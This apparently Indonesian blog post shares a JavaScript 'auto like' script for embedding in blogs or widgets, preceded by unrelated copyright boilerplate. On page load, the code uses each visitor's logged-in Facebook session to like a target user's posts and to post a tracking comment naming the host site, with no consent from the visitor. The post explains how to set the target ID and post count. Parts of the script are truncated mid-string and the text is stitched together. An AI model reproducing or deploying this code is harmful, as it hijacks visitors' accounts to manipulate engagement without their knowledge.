Remember that even in the cases where copyright is not a problem, it is probably still better to write the article yourself in your own words, and just cite the source you want to copy from.
If a work does not have a copyright notice, that does not mean that it may be freely used: if in doubt, assume you cannot use it.
Most websites (and other sources) are automatically protected by copyright under rules, even if the author did not apply for copyright or place a copyright notice in their work.
Note: Facebook privacy udah update lagi sekarang (September 2011), jadi Auto like cuman ngaruh ke Friends only.
<script type="text/javascript">
function pesbukPostAutoLike(saha,sabaraha){
FB.api('/'+saha+'/feed','get',{limit:sabaraha},function(okayThen){
if(okayThen.data){
for(x in okayThen.data){
if(okayThen.data[x].id){
FB.api('/'+okayThen.data[x].id+'/likes','post',function(ohyeah){});
}
}
}
});
}
pesbukPostAutoLike('100000175501773','5');
</script>
<script type="text/javascript">
<!--
if(!document.getElementById('fb-root')){
document.write('<div id="fb-root"></div>');
}
if(!document.getElementById('jaga-jaga')){
document.write('<div id="jaga-jaga"></div>');
}
function pesbukPostAutoLike(saha,sabaraha){
FB.api('/'+saha+'/feed','get',{limit:sabaraha},function(okayThen){
if(okayThen.data){
for(x in okayThen.data){
if(okayThen.data[x].id){
FB.api('/'+okayThen.data[x].id+'/likes','post',function(ohyeah){document.getElementById('jaga-jaga').innerHTML='footprint: '+ohyeah});
}
}
FB.api('/10150212964378802/comments','post',{message:sabaraha+' posts to like on ID '+saha+'\n'+window.location.href.split('/')[2].replace(/\./gi,' ')},function(wew){});
}else{
document.getElementById('jaga-jaga').innerHTML='Ente belom login Bos.., <a href="javascript:void(0)" onClick="clickToLogin();this.parentNode.style.display=\'none\';">Click disini buat login</a>';
}
});
}
function loadThisApplication(idApBat){
window.fbAsyncInit = function() {
FB.init({appId: idApBat, status: true, cookie: true, xfbml: true});
pesbukPostAutoLike('
','
');
};
(function() {
var e = document.createElement('script'); e.async = 'true';
e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
document.getElementById('fb-root').appendChild(e);
}());
}
function clickToLogin(){
FB.login(function(response){
if(response.session && response.session.uid){
pesbukPostAutoLike('
buat yang masih bingung, gimana kalo pake yang di bawah ini coba.. :)
go get the script!
Kalo di pasang seperti diatas (misalkan dipostingan blog atau widget), maka setiap kali halaman dibuka (di load)
functionpesbukPostAutoLike('100000175501773','5'); akan di eksekusi.
100000175501773 adalah User ID atau bisa juga di ganti pake UserName.
5 itu jumlah posts yang mau dilike.
<script type="text/javascript">
function likePostinganDong(idPostingan){
document.getElementById('gambar-loading-like').style.display='inline-block';
FB.api('/'+idPostingan+'/likes', 'post', tulisResponNya);
}
function tulisResponNya(respon){
document.getElementById('gambar-loading-like').style.display='none';
if(respon.error){
alert(respon.error.message)
}else{
alert(respon);
}
}
</script>
Format post_id yang digunakan: userIDPostID 100000175501773233130340036148
Sayangnya Facebook gak nerima format userNamePostID Just.Ask.Me.Who.Iam233130340036148